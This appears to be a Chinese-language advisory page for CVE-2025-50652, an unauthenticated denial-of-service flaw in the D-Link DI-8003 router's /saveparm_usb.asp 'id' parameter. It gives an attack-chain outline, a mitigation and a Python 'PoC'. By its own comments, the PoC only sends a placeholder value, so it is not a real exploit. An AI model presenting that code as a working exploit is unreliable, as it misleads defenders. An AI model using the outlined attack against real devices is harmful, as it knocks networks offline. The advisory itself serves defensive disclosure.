CVE-2025-50652 CVSS 7.5 高危

CVE-2025-50652 D-Link DI-8003参数处理漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-50652

漏洞类型

参数处理不当

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DI-8003

漏洞概述

D-Link DI-8003路由器固件版本16.07.26A1存在安全漏洞。该漏洞源于/saveparm_usb.asp端点对id参数处理不当。攻击者无需认证即可通过网络利用此缺陷，发送恶意请求导致设备服务不可用，造成拒绝服务攻击。此漏洞严重影响设备可用性，建议尽快修复。

技术细节

该漏洞位于D-Link DI-8003的Web接口/saveparm_usb.asp端点。由于未对id参数进行严格校验，攻击者可构造特殊参数值触发逻辑错误。CVSS 3.1评分7.5，属于高危漏洞。攻击无需用户交互及权限，利用难度低。成功利用后，攻击者可导致设备崩溃或重启，造成高可用性影响（A:H）。虽然未直接泄露数据或破坏完整性，但服务中断对网络环境稳定性构成严重威胁。攻击者可通过网络扫描批量发现目标并实施攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别开放Web管理界面的D-Link DI-8003设备。

STEP 2

漏洞利用

向目标设备的/saveparm_usb.asp端点发送带有恶意构造id参数的HTTP请求。

STEP 3

影响

由于参数处理逻辑错误，设备Web服务或系统进程崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-50652 PoC
# Target: D-Link DI-8003 16.07.26A1
# Endpoint: /saveparm_usb.asp
# Description: Improper handling of 'id' parameter leads to Denial of Service

target_url = "http://<TARGET_IP>/saveparm_usb.asp"

# Construct payload based on the vulnerability description
# The 'id' parameter is not handled correctly
payload = {
    "id": "test_payload" # Replace with actual exploit string if known
}

try:
    print(f"[+] Sending request to {target_url}...")
    response = requests.get(target_url, params=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check device status for DoS.")
    else:
        print(f"[-] Unexpected status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

D-Link DI-8003 16.07.26A1

防御指南

临时缓解措施

在未升级固件前，建议将设备Web管理界面仅允许内网特定IP访问，或通过ACL（访问控制列表）限制对/saveparm_usb.asp端点的访问，以降低被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表